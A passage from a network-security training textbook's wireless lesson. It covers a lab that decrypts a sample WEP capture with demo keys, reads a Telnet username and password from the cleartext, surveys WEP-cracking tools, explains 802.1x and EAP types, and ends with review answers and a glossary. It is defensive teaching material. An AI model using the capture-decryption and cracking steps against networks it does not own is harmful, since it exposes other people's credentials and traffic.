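            if "S" in p[FLAGS] and "A" not in p[FLAGS]:
                syn = p
        elif synack is None:
            if ("S" in p[FLAGS] and "A" in p[FLAGS]
                    and (p[SRC], p[SPORT]) == (syn[DST], syn[DPORT])):
                synack = p
        elif ("A" in p[FLAGS] and "S" not in p[FLAGS]
                and (p[SRC], p[SPORT]) == (syn[SRC], syn[SPORT])):
            return (syn[NUM], synack[NUM], p[NUM])
    return None

def describe(packets, number):
    """Summary a practitioner would read off the filtered packet list."""
    flow = select_related_by_flow(packets, number)
    return {
        "packets": [p[NUM] for p in flow],
        "endpoints": sorted(endpoints(flow)),
        "handshake": find_handshake(flow),
    }

if __name__ == "__main__":
    print(describe(PACKETS, 16))
```

Running it on packet 16 reports the same thing the task asks for: the flow consists of packets 16, 19, 21, 22 and 23, the endpoints are 192.168.0.11 and 192.216.124.4, and the handshake is 16, 19, 21. Packet 17's flow never completes its handshake, so the detector returns None for it; that distinction (SYN seen but never acknowledged) is the same one an analyst uses to spot scans and half-open connections in a larger capture.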
Decode WEP
If you are analyzing traffic on your own network, you know what the WEP key is. In this case, you are not cracking anything; you will use the key to decrypt WEP-protected data on screen. OmniPeek Personal has an option to UnWEP packets, provided you have the required key.
TASK 9D-7
Decrypting WEP
1. If it is not already open, open OmniPeek Personal.
2. Choose File→Open.
3. Browse to \WildPackets\OmniPeek Personal\Samples\Wireless\telnet-wep.apc and click Open. Notice that under the Protocol column, no protocol information for higher layers is available. (You can reorder the columns, if you wish.)
4. Double-click packet 6.
5. What is the type and subtype of this packet?
Type 10 (Data) and Subtype 0000 (Data Only).
6. According to the frame control flags, is WEP enabled, and is this likely for an ad-hoc or an infrastructure network?
Yes, WEP is enabled, and the ToDS bit is set, so this is an infrastructure network.
7. What is the WEP IV for this packet?
0x050100
8. To get back to the main packet list, close the packet details.
9. Choose Tools→Decrypt WLAN Packets.
10. Select the Encrypted Only radio button and click the button to the right of the Use Key Set text box.
11. Click the Insert button.
12. In the Name text box, type UnWEP1. In the Key 1 text box, type 0123456789 and in the Key 2 text box, type 9876543210. Click OK. These values are part of the OmniPeek Personal demo.
13. In the Key Sets window, click your newly created UnWEP1 set, and click OK.
14. In the Decrypt WLAN Packets window, click OK to perform the decryption with the UnWEP1 key set. It will only take a brief moment to perform the decryption. You will see right away that the packets are decrypted, and the protocols and other details are now exposed.
15. Starting with packet 1, what are the other packets involved in the three-way handshake?
Packets 1, 2, and 3.
16. What IP address is associated with the Telnet client?
192.168.0.11
17. What packet holds the login request from the Telnet server?
Packet 8.
18. Examine the details of lines 9, 12, 15, 18, 20, 24, 27, 30. What can you learn from the information in these lines?
You can learn the login is sysadmin. (Note: Look at the values presented in the Line 1 field of these packets together.)
19. What does it appear that the password is for this login session?
The password looks like foo, from lines 36, 39, and 42. (Note: Look at the values presented in the Line 1 field of these packets together.)
20. Which packets are used to end the Telnet session?
Packets 63, 64, 65, and 66.
21. Double-click line 63. This is the Ack/Fin to close the session from the Telnet server.
22. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 0 and the FromDS bit is set to 1.
23. After you identify the bit setting, click the green right-arrow to move to the next packet. This is packet 64, the return Ack to the server.
24. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 1 and the FromDS bit is set to 0.
25. After you identify the bit setting, click the green right-arrow to move to the next packet. This is packet 65, the Ack/Fin from the client to the server.
26. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 1 and the FromDS bit is set to 0.
27. After you identify the bit setting, click the green right-arrow to move to the next packet. This is packet 66, the return Ack from the server.
28. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 0 and the FromDS bit is set to 1.
29. After you identify the bit setting, click the green right-arrow to move to the next packet.
30. Close all open windows. Click No if you are prompted to save the file, and click Yes to exit OmniPeek Personal.
Aircrack
Aircrack is a whole set of wireless tools that work in 802.11a/b/g networks. Included in this suite are Airodump, a wireless packet capture program, and Aireplay, a wireless packet injection tool, along with the ability to crack WEP encryption. By using packet injection, the tool can ensure that enough packets are available for decryption.
WEPCrack
As the name directly implies, WEPCrack, which runs best on UNIX systems, is a wireless tool designed to crack WEP keys. One thing to note is that this tool will require a lot of packets to do its job. It must sniff and analyze the packets, searching for the weak IVs it can exploit.
The amount of data that you need to capture before WEPCrack can crack the code can be seven or eight gigabytes. Of course it is possible that redundancy will be found earlier, but you should be aware that this is not a fast or instantaneous process like some of the online password cracking utilities.
AirSnort
AirSnort, like WEPCrack, can crack WEP keys, and is also designed to run on Linux. AirSnort, once activated, can crack WEP automatically without user input. This tool will run on both the ORiNOCO and Prism chipsets, but seems to have a preference towards using the ORiNOCO cards. If it is not already, you can expect AirSnort to become a required tool in all wireless analysts' tool kits in the very near future.
Ekahau
Ekahau is a wireless auditing tool that allows you to pinpoint the actual physical location of wireless devices in your network. Using this tool, you make a map of your office, and then perform a survey of the office. Once the survey is done, the system is aware of the wireless network in the space.
When the map is complete, you can identify specific nodes in the network. In the event that you identify an unknown node, you can use this tool to locate that node. The accuracy is listed within a few feet. You then can simply walk up to the person using the network with the unidentified node and say hello.
Kismet
Kismet is a powerful wireless network tool that can perform network sniffing, log data in a Wireshark format for simple analysis, and enable you to plot wireless data and detected networks directly onto downloaded maps.
Topic 9E
Wireless Trusted Networks
While there have been many advances in securing wireless networks beyond WEP, some of which you have examined in this lesson, there is more work to be done before an enterprise will trust wireless networking for any critical application. This is the realm of the 802.11i working group.
802.1x and EAP
802.11i will employ multiple types of security, to allow for flexibility in deployment and stronger security. When the attacker has one single attack point, such as WEP, their job is easier. By allowing for different implementations, the job of attacking 802.11i networks will be much more difficult.
In order to meet the goals of solid wireless security, 802.11i will employ 802.1x and EAP. 802.1x is the authentication technology that requires mutual authentication before allowing the client to progress further into the network; this is called port-based access control. EAP is the Extensible Authentication Protocol, which allows for the use of different authentication solutions, and is currently most well known for its use in PPP (Point-to-Point Protocol).
You can consider this method of security as built upon three layers. One layer is the 802.11 physical carrier of the network traffic. On top of the 802.11 physical carrier, you have the 802.1x authentication system, which can use the various EAP implementations. Combined, these mechanisms provide for solid wireless security.
Figure 9-29: The location of EAP, 802.1x, and the physical 802.11 network.
Note: 802.1x allows for port-based access control and EAP allows for mutual authentication.
By implementing this type of security, you have achieved several goals that are not possible in open wireless networks. These are some of the goals that are met with this system:
1. Mutual authentication between the client and the authentication server before network access is granted.
2. User authentication is required, not simple system authentication.
3. Keys are generated dynamically.
4. Strong encryption, with the ability to ensure data integrity.
There is similarity to the WPA security system you examined earlier. A significant difference is that to build a wireless PKI, you will need to use and configure digital certificates. WPA operates by using a shared key, whereas you will not have that type of manually-input shared key in a trusted wireless network. There are enough similarities, however, that the final security implementation based on the technologies in this lesson will be called WPA-2.
There are three primary components of the trusted wireless network: the end client, the access point, and the authentication server. The authentication server is commonly a RADIUS server but may be configured to your network's needs. You may see the client referred to as the supplicant in some texts, because it is technically the software that is involved in the process, not the client machine, and that software is called the supplicant.
EAP Types
There are four primary EAP types for wireless networking implementation. They are EAP with Transport Layer Security (EAP-TLS), EAP with Tunneled Transport Layer Security (EAP-TTLS), Cisco's Lightweight EAP (LEAP), and Protected EAP (PEAP). Each type has a unique combination of requirements for the client, authentication server, and delivery of the key.
It is worth noting that there is another type of EAP, called EAP-MD5. Although a valid EAP type, it is not used in trusted wireless networking. This is because the authentication of the client is done by hashing the user's password with MD5 and transmitting the hash. The RADIUS server, or whatever authentication server is in use, checks the MD5 hash for a match and, if there is a match, authentication is successful. In a controlled physical network, such as Ethernet, this may have a place, but in the wireless world, where traffic can be sniffed from the air, this is not a good system for implementing security. Due to this, you should not implement security based on EAP-MD5 in your wireless network.
Lightweight EAP (LEAP)
Cisco has led the development of LEAP. LEAP requires a mutual password for authentication. This password is manually configured on the client and the authentication server. When the authentication server challenges the client, the password is returned.
Although this provided good security at a time when the WEP implementation was cracked, it is not strong enough for a trusted network. This is because of the reliance on the shared password. A benefit of LEAP is that, even though it is not built into operating systems, Cisco has provided enough support that implementation on most platforms is not an issue.
Note: There are five EAP types, but EAP-MD5 is not recommended for wireless PKI, so it is not included as one of the main EAP types.
Since the single shared password exists, there is the possibility of a man-in-the-middle attack, and the issue of password reuse. LEAP is definitely a step in the right direction and provides better security than WEP, but it is recommended that for your wireless PKI you move forward to other systems.
EAP with Transport Layer Security (EAP-TLS)
EAP-TLS is a system that fits into the trusted network as it utilizes X.509 certificates, with both the client and the server needing unique certificates. Both sides of the communication must prove their identity to the other party. There is very little information that can be sniffed in this system. One of the few things that an attacker could sniff is the name of the client node. Figure 9-30 shows the steps of the EAP-TLS process.
Figure 9-30: The process of a client using an EAP-TLS protected network.
In the EAP-TLS example, the client begins the process by associating with the AP. The AP will block any further access until an accept message is sent from the authentication server to the AP. The AP responds to the client, essentially telling the client to send the required initial EAP request, which the AP then forwards on to the authentication server.
The server receives the request and responds by sending the server's digital certificate to the client. Once the client validates the information on the server's certificate, the client responds with the client digital certificate. Once the server validates the client's certificate, the server begins the process of creating the mutual key to use. This is done following standard public key cryptography systems. Once the key is generated, the server sends a message to the AP that authentication is successful, with the AP then informing the client of the successful authentication. The client proceeds to use the generated key to encrypt traffic, and the AP allows the client access to the LAN.
EAP with Tunneled Transport Layer Security (EAP-TTLS)
EAP-TTLS takes the fundamental process of EAP-TLS and modifies it a bit. The primary difference between EAP-TLS and EAP-TTLS is that in the EAP-TTLS system only the server is required to authenticate itself; the client certificate is not required. This does not mean that the client never has to provide authentication data; only that it is not required during this initial setup.
Figure 9-31: The process of a client using an EAP-TTLS protected network.
The process begins with the client associating with the AP, and then being required to begin the EAP-TTLS process. The server sends the server certificate, which the client validates, and then the client and server build an encrypted tunnel. This is very similar to how a tunnel is created with SSL.
Once the tunnel is created, the client will present whatever credentials are required (certificate, token, standard password, and so on), using the algorithm that the administrator has chosen. In the tunnel, most algorithms will function without any difficulty, such as PAP, CHAP, MS-CHAP, MS-CHAPv2, EAP-MD5, and so on.
When the user has successfully authenticated, the server sends the success message to the AP, which in turn sends the success message to the client. Now that the client has successfully gone through this process, messages can be encrypted and sent to the LAN through the AP.
Protected EAP (PEAP)
PEAP was jointly developed by Microsoft, Cisco, and RSA Security, and combines different existing security mechanisms. There are two parts to the PEAP process, with the first being similar to that of EAP-TLS. The second is similar to EAP-TTLS in that multiple authentication systems are supported.
The client begins the process by associating with the AP. The AP will block any further access until an accept message is sent from the authentication server to the AP. The AP responds to the client, essentially telling the client to send the required initial EAP request, which the AP then forwards on to the authentication server.
The server receives the request and responds by sending the server's digital certificate to the client. Once the client validates the information on the server's certificate, the client responds with whatever authentication system is called for. This may be certificates, tokens, passwords, and so on. Once the server validates the client's authentication information, the server begins the process of creating the mutual key to use. This is done following standard public key cryptography systems. Once the key is generated, the server sends a message to the AP that authentication is successful, with the AP then informing the client of the successful authentication. The client then proceeds to use the generated key to encrypt traffic, and the AP allows the client access to the LAN.
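The EAP-TLS, EAP-TTLS and PEAP descriptions above share one skeleton: the AP keeps its controlled port closed, the server proves itself with a certificate, the client then proves itself (its own certificate for EAP-TLS, a credential sent inside the tunnel for EAP-TTLS and PEAP), and only after the server's accept message does traffic flow. The following Python simulation is an added example, not part of the course or of any vendor's product, that runs those three exchanges and reports the transcript and the port state. The certificates, the tunnel and the key derivation are toy stand-ins (an HMAC by a pretend CA, a flag, and an HMAC over the two nonces); the server name radius.example.test, the user alice and her password are constructed.

```python
"""Simulation of the 802.1x / EAP exchanges described for EAP-TLS, EAP-TTLS
and PEAP (added example, not course or vendor code). Certificates are a toy
stand-in (an HMAC by a pretend CA), the TLS tunnel is a flag, and the key
schedule is an assumed HMAC over both nonces; the message order and the
closed controlled port until Access-Accept are the point."""
import hashlib
import hmac
import os

CA_KEY = os.urandom(32)          # toy CA: a "certificate" is a subject plus an HMAC tag over it

def issue_cert(subject):
    return {"subject": subject, "sig": hmac.new(CA_KEY, subject.encode(), hashlib.sha256).digest()}

def cert_valid(cert):
    expected = hmac.new(CA_KEY, cert["subject"].encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, cert["sig"])

def derive_key(premaster, c_nonce, s_nonce):
    """Assumed stand-in for the TLS key schedule; both ends hold all three inputs."""
    return hmac.new(premaster, b"session" + c_nonce + s_nonce, hashlib.sha256).digest()

class AuthServer:
    """RADIUS-like server: owns a server certificate and the user database."""
    def __init__(self, users):
        self.cert, self.users = issue_cert("radius.example.test"), users

    def accept(self, method, identity, proof, tunnel_up):
        if method == "EAP-TLS":          # the client must present its own valid certificate
            return proof is not None and cert_valid(proof) and proof["subject"] == identity
        # EAP-TTLS / PEAP: server certificate only; the inner credential is a password
        return tunnel_up and self.users.get(identity) == proof

class Authenticator:
    """The AP: relays EAP and keeps the controlled port closed until Access-Accept."""
    def __init__(self, server):
        self.server, self.port_open = server, False

    def forward_data(self, frame):
        """Data frames are dropped (False) while the controlled port is closed."""
        return self.port_open

def run_eap(method, supplicant, ap):
    """One authentication. Returns (port_open, session_key or None, transcript)."""
    t = [("STA->AP", "associate"), ("AP->STA", "EAP-Request/Identity"),
         ("STA->AP->AS", f"EAP-Response/Identity {supplicant['identity']}")]  # the one cleartext name
    ap.port_open = False                                                      # blocked until Accept
    s_nonce = os.urandom(16)
    t.append(("AS->AP->STA", f"server certificate {ap.server.cert['subject']} + nonce"))
    if not cert_valid(ap.server.cert):                                        # client validates server
        t.append(("STA", "server certificate rejected, abort"))
        return False, None, t
    c_nonce, premaster = os.urandom(16), os.urandom(32)
    if method == "EAP-TLS":
        proof, tunnel_up = supplicant.get("cert"), False
        t.append(("STA->AP->AS", "client certificate" if proof else "no client certificate"))
    else:
        proof, tunnel_up = supplicant.get("password"), True
        t.append(("STA<->AS", f"{method} tunnel up; inner credential sent inside it"))
    if not ap.server.accept(method, supplicant["identity"], proof, tunnel_up):
        t += [("AS->AP", "Access-Reject"), ("AP->STA", "EAP-Failure")]
        return False, None, t
    key = derive_key(premaster, c_nonce, s_nonce)                             # the mutual key
    t += [("AS->AP", "Access-Accept + key material"), ("AP->STA", "EAP-Success")]
    ap.port_open = True
    return True, key, t

if __name__ == "__main__":
    server = AuthServer({"alice": "s3cret"})
    ap = Authenticator(server)
    alice = {"identity": "alice", "cert": issue_cert("alice"), "password": "s3cret"}
    for method in ("EAP-TLS", "EAP-TTLS", "PEAP"):
        ok, _, transcript = run_eap(method, alice, ap)
        print(method, "port open" if ok else "blocked")
        for hop, msg in transcript:
            print("  ", hop, msg)
```

Two behaviours are worth checking against the text. A supplicant without a certificate is refused under EAP-TLS but accepted under EAP-TTLS or PEAP with a correct password, which is the "client certificate is not required" distinction; and a server whose certificate does not validate is rejected by the supplicant before any client credential is sent, which is why validating the server certificate on the client side matters for the tunnelled methods.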
EAP Type Comparison
Looking at these systems, it may be a bit overwhelming to put them in perspective and decide what you should implement. Part of your decision may be based on hardware. For example, if you are running all Cisco networking equipment, you have the choice of LEAP, EAP-TLS, and EAP-TTLS installed on all their current adapters. If you are running all Linux nodes, you are limited to EAP-TLS and EAP-TTLS. On the other hand, only PEAP and EAP-TLS are embedded in Windows XP, 2000, and 2003.
Type                                            | LEAP                    | EAP-TLS                            | EAP-TTLS                            | PEAP
------------------------------------------------|-------------------------|------------------------------------|-------------------------------------|-----------------------------------
Embedded O/S Clients                            | Cisco                   | Windows XP/2003/2000               | None                                | Windows XP/2003/2000
O/S Clients, when using third-party supplicants | All Win32               | All Win32, Mac OS X, Linux, BSD    | All Win32, Mac OS X, Linux, BSD     | All Win32
Supplicant Vendor                               | None                    | Microsoft, Cisco, Funk, and others | Microsoft, Funk, and others         | Microsoft, Funk, and others
RADIUS Support                                  | Cisco, Funk, and others | Cisco, Funk, Microsoft, others     | Funk, and others                    | Cisco, Funk, Microsoft, and others
Server Authentication                           | Password Hash           | Public Key Certificate             | Public Key Certificate              | Public Key Certificate
Client Authentication                           | Password Hash           | Public Key Certificate             | PAP, CHAP, MS-CHAP, EAP, and others | Varies as per implementation.
Dynamic Key Use                                 | Yes                     | Yes                                | Yes                                 | Yes
Open Standard                                   | No                      | Yes                                | Yes                                 | Yes
Unique Key per User                             | Yes                     | Yes                                | Yes                                 | Yes
Overall Security Level                          | Moderate                | Strongest                          | High                                | High
Wireless Trusted Network Summary
If your enterprise requires a wireless component, you should implement a wireless PKI, or else be aware of the high levels of risk. If you already have a PKI running, the addition of the wireless PKI component is a natural extension. If you do not have a PKI running, and do not want to implement a full-scale trusted network, you can implement a PKI just for your wireless network.
The Funk Software company makes a tool called Odyssey that will fill this purpose. You can run Odyssey on a machine as your authentication server, and utilize the security features of PKI on your wireless clients alone. This will enable you to take advantage of all that wireless networking has to offer, and have a secure network at the same time.
TASK 9E-1
Choosing a Wireless Trusted Network
1. Consider the following scenario:
You work for a company that is a global enterprise. The company is often listed in the top 50 companies in the world. You work out of the corporate office, based in Chicago, IL. There are 300 regional offices, and over 2,000 small satellite offices. In the HQ, there is discussion of configuring a new wireless network.
This new wireless network is going to be a case study, and if all goes well, similar systems will be implemented in all the regional offices, and eventually in the satellite offices. The current discussion is on the security of the wireless network. For the case study, the implementation will be a single file server, which local network clients will need to access frequently.
During the case study, there will be approximately 75 users participating (all of whom are running Windows 2000 or Windows XP), spread throughout two different floors of the HQ. During the discussion it is agreed quickly that WEP will not be used, and now the discussion is moving towards the specific security system to use.
To provide the maximum level of security, which security system will you recommend for the implementation?
Even though this is a case study, you realize that if successful, the security system will be duplicated worldwide. Your goal is to provide the maximum level of security, so your choice is to go with an EAP-TLS implementation. This will allow for full use of certificates, on both the client and server.
Summary
In this lesson, you examined the fundamental issues of wireless networking, including the required equipment and transmission media of wireless networks. You then identified WLAN issues such as the function of the AP, the configuration of SSIDs, and the choices between an ad-hoc and infrastructure network. You detailed the 802.11 framing and use of multiple MAC addresses. You then identified the security solutions for the wireless networks, including WEP, WPA, and WTLS. You examined the tools for performing security audits, and the methods available for creating a trusted wireless network using digital certificates.
Lesson Review
9A Which type of spread spectrum signal uses multiple frequencies at the same time?
Direct Sequence Spread Spectrum (DSSS).
Why is 802.11a incompatible with 802.11b?
They use different spread spectrum techniques.
What are the two primary pieces of equipment for the wireless network to be operational?
The Access Point and the Wireless Network Interface Card (WNIC).
What language is used to create web content for handheld devices, such as cell phones, when they connect to the Internet?
WML.
9B What is association?
The process of a WNIC associating with an AP in order to use the wireless network.
What are the two WLAN topologies?
Ad-hoc mode and infrastructure mode.
What is the name assigned to people who search out WLANs?
War drivers.
9C What additional piece of software is required to configure WPA on Windows 2000 WNIC clients?
Supplicants.
What component of WEP is the cause of its weakness?
The Initialization Vector (IV).
What cipher does WEP utilize?
RC4.
9D What tool used in this lesson provides you with a fast scan of the APs in your area?
NetStumbler.
What tools can be used to break WEP?
Aircrack, AirSnort, and WEPCrack.
What tool can provide you with the physical positioning of a wireless node in the network?
Ekahau.
What tool allows you to perform full wireless packet capture and analysis?
OmniPeek Personal.
9E What does 802.1x provide?
Port-based access control.
What does EAP provide?
Authentication.
Why is EAP-MD5 not suitable for trusted wireless networks?
The shared password hash is susceptible to sniffing and other attacks.
Why is EAP-TLS considered the strongest for wireless trusted network implementation?
Because certificates are required on both the client and the server.
GLOSSARY
attack
An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.
audit trail
In computer security systems, a chronological record of system resource usage. This includes user login, file access, other various activities, and whether any actual or attempted security violations occurred.
audit
The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.
authentication
To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.
availability
Assuring information and communications services will be ready for use when expected.
back door
A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls.
breach
The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.
bug
An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.
compromise
An intrusion into a computer system where unauthorized disclosure, modification, or destruction of sensitive information may have occurred.
confidentiality
Assuring information will be kept secret, with access limited to appropriate persons.
cryptography
The art or science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.
DES
(Data Encryption Standard) Definition 1: An unclassified crypto algorithm adopted by the National Bureau of Standards for public use. Definition 2: A cryptographic algorithm for the protection of unclassified data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.
false positive
Occurs when the system classifies an action as anomalous (a possible intrusion) when it is a legitimate action.
firewall
A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical firewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.
hacker
A person who enjoys exploring the details of computers and how to stretch their capabilities. A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.
host
A single computer or workstation; it can be connected to a network.
integrity
Assuring information will not be accidentally or maliciously altered or destroyed.
intrusion detection
Pertaining to techniques that attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts, either manually or via software expert systems that operate on logs or other information available.
intrusion
Any set of actions that attempts to compromise the integrity, confidentiality, or availability of a resource.
key
A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.
network security
Protection of networks and their services from unauthorized modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.
network
Two or more machines interconnected for communications.
AH
(Authentication Header) A field that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram.
authenticate
To establish the validity of a claimed user or object.
crash
A sudden, usually drastic failure of a computer system.
ESP
(Encapsulating Security Payload) A mechanism to provide confidentiality and integrity protection to IP datagrams.
LAN
(Local Area Network) A computer communication system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communication system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, front-end processors, controllers, and servers.
metric
A random variable x representing a quantitative measure accumulated over a period.
non-repudiation
Method by which the sender of data is provided with proof of delivery and the recipient is assured of the sender's identity, so that neither can later deny having processed the data.
OSI
(Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.
packet filter
Inspects each packet for user-defined content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of firewall.
packet filtering
A feature incorporated into routers and bridges to limit the flow of information based on pre-determined communications such as source, destination, or type of service being provided by the network. Packet filters let the administrator limit protocol-specific traffic to one network segment, isolate email domains, and perform many other functions.
packet sniffer
A device or program that monitors the data traveling between computers on a network.
packet
A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.
passive threat
The threat of unauthorized disclosure of information without changing the state of the system. A type of threat that involves the interception, not the alteration, of information.
penetration
The successful unauthorized access to an automated system.
perpetrator
The entity from the external environment that is taken to be the cause of a risk. An entity in the external environment that performs an attack, i.e., a hacker.
physical security
The measures used to provide physical protection of resources against deliberate and accidental threats.
plaintext
Unencrypted data.
profile
Patterns of a user's activity from which changes in normal routines can be detected.
promiscuous mode
Normally, an Ethernet interface reads all address information and accepts follow-on packets only destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination.
protocol
Agreed-upon methods of communications used by computers. A specification that describes the rules and procedures that products should follow to perform activities on a network, such as transmitting data. If they use the same protocols, products from different vendors should be able to communicate on the same network.
proxy
A firewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all traffic passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps do additional authentication, and then complete a connection on behalf of the user to a remote destination.
router
An interconnection device that is similar to a bridge, but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer.
security audit
A search through a computer system for security problems and vulnerabilities.
security level
The combination of a hierarchical classification and a set of non-hierarchical categories that represents the sensitivity of information.
security policies
The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information.
security violation
An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information contained therein or to the system itself.
security
A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.
server
A system that provides network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.
sniffer
A program that captures data crossing a computer network. Used by hackers to capture user IDs and passwords. A software tool that audits and identifies network traffic packets; it is also used legitimately by network operations and maintenance personnel to troubleshoot network problems.
SNMP
(Simple Network Management Protocol) Software used to control network communications devices using TCP/IP.
SSH
(Secure Shell) A completely encrypted shell connection between two machines, protected by a very long pass-phrase.
SYN flood
When the SYN queue is flooded, no new connection can be opened.
threat
The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.
topology
The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information flows.
traceroute
An operation of sending trace packets for determining information; traces the route of UDP packets from the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination.
Trojan Horse
An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.
vulnerability analysis
Systematic examination of an AIS or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.
vulnerability
Hardware, firmware, or software flaw that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.
3DES, 353
802.11 addressing, 478-481
802.11 framing, 476-481
frame details, 476-478
frame format, 476
802.11a standard, 460
802.11b standard, 461
802.11c standard, 461
802.11d standard, 461
802.11e standard, 461
802.11f standard, 461
802.11g standard, 461
802.11h standard, 462
802.11i standard, 462
802.11n standard, 462
802.1x, 512
A
access control, 15
access points, 448-449
Also see: APs
accountability, 377
acknowledgement numbers, 47
ACL
anti-DoS, 142
anti-Land, 143
anti-spoofing, 143-144
anti-SYN, 142-143
command syntax, 138-139
creating, 134-135
defending against attacks, 142-144
extended syntax, 139-140
implementing, 138-142
logging, 149-151
operation, 135
activate, 416-418
Active Defense-in-Depth, 7-8
active open connection, 48-50
administrative distance, 123-124
AH, 344
combine with ESP in IPSec, 327-329
configuring, 321-322
Transport mode, 303
Tunnel mode, 303
AH and ESP
in IPSec, 327-329
response policy, 335-336
session analysis, 331-332
Aircrack, 526
AirSnort, 527
alert, 416-418
alert notication, 376
analysis, 382-383, 391
anomaly detection, 373
anti-spoofing logging, 150
APs, 448-449
configuration, 482-485
ARP process, 108-110
attack monitoring, 397
attack response, 10
audit data
handling, 25
preserving, 25
audit trails, 25
auditing, 22-23
authentication, 3-5, 16, 98-99, 303, 352-353
Authentication Header, 344
Also see: AH
authentication methods
editing policies, 317-318
authentication tokens, 16-20
authorization, 98-99
authorization and availability, 3-5
awareness, 9
B
banners, 101
basics, 42-43
behavioral use, 379-382
binary conversion, 37-38
Bluetooth, 459
breach, 5-6
broadcast, 44-45
buffered logging, 147-148
bug, 96
business drivers
for a VPN, 338
INDEX
Index 543
C
capture packet data, 411-413
captures
displaying, 54-55
castle analogy, 10-11
CDP, 128-129
centralized host-based design, 384-385
Challenge Handshake Authentication Protocol, 352-353
Also see: CHAP
Challenge Response Process, 17-18
challenge response token, 16-17
CHAP, 352-353
CIDR, 43-44
Cisco
banners, 101-103
logging, 145-146
OS, 96
router language, 96
Cisco Discovery Protocol
See: CDP
Classless Interdomain Routing
See: CIDR
Client policy, 306-307
collection, 382-383
command console, 375
confidentiality, 3-5
configuration fragments, 97-98
connection, 48-50
establishing, 48-49
terminating, 49-50
connections
TCP, 63-64
console logging, 147
console password, 99
cryptography, 302
D
DAC, 15
Data Encryption Standard
See: DES
decimal conversion, 37-38
Default Response, 318-321
defense technologies, 13-14
Defense-in-Depth, 6
defensive strategy, 8-10
denial of host, 140-141
denial of network, 141
denial of subnet, 141
DES, 307-308, 353
detection, 371
Direct Sequence Spread Spectrum, 458-459
Also see: DSSS
Discretionary Access Control, 15
Also see: DAC
distance vector routing, 121
distributed host-based design, 386-387
DSSS, 458-459
dynamic, 416-418
dynamic routing, 116-118
E
EAP, 506-507
comparison of types, 532-533
Lightweight, 529-530
Also see: LEAP
Protected, 531-532
Also see: PEAP
types, 529
with Transport Layer Security, 530
Also see: EAP-TLS
with Tunneled Transport Layer Security, 531
Also see: EAP-TTLS
EAP-TLS, 352-353, 530
EAP-TTLS, 531
Ekahau, 527
enable password, 99
Encapsulating Security Payload, 344
Also see: ESP
encryption, 21-22
ESP, 344
combine with AH in IPSec, 327-329
Transport mode, 303
Tunnel mode, 303
Ethereal, 58-59
Extensible Authentication Protocol, 506-507
Also see: EAP
Extensible Authentication Protocol-Transaction Level Security, 352-353
Also see: EAP-TLS
extranet, 338
F
false-negative, 373-375
false-positive, 373-375
FHSS, 458
finger, 131
firewall, 303
Firewall-based VPNs, 339-340
firewalls, 21
Frequency Hopping Spread Spectrum, 458
Also see: FHSS
FTP
capture, 76-78
configuring, 322-323
granting, 142
session analysis, 79
Fundamental Access Point Security, 493-494
H
Hardware-based VPNs, 339-340
hexadecimal conversion, 37-38
host, 33-36
host-based intrusion detection, 384
I
ICMP, 129-130
direct broadcast, 129
session analysis, 76
unreachable, 129-130
ICMP messages, 68-70
IDS, 9, 22, 371
components, 375-376
goals of, 376-377
matrix, 373-375
response, 376
IEEE 802.11 standard, 460-462
independent audit, 24-25
infrared wireless media, 453-454
inside threats
detecting, 396
integrity, 3-5, 65-68
Internet Protocol
See: IP
Internet Security Association Key Management Protocol (ISAKMP/Oakley), 345-346
interval analysis, 391
intrusion, 373
